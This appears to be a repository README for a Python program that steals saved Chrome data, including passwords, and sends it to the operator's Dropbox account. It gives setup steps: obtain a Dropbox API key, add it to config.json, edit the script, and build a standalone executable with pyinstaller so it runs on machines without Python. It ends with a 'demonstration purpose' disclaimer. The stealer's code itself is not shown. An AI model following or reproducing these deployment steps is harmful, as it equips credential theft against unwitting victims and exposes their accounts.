A python application to steal chrome data and push it back to you Finds the data , pushes it back to you.
An Improvised Version of Shaskank Chandak's Password Stealer. What's improved you may ask? That version doesn't work!
- Get an DropBox API key from Here
- After you get the key add it in
config.json
-
Make the edits in your .py file (add your api key etc)
-
Now install pyinstaller
$ pip install pyinstaller
- Build the package by executing following command
pyinstaller --onefile chromepass.py
NOTE: After you build the executable, It will work on any machine even if that machine doesn't have python installed.
I am not responsible for any damage caused by you , using this app . This app is made only for demonstration purpose itself.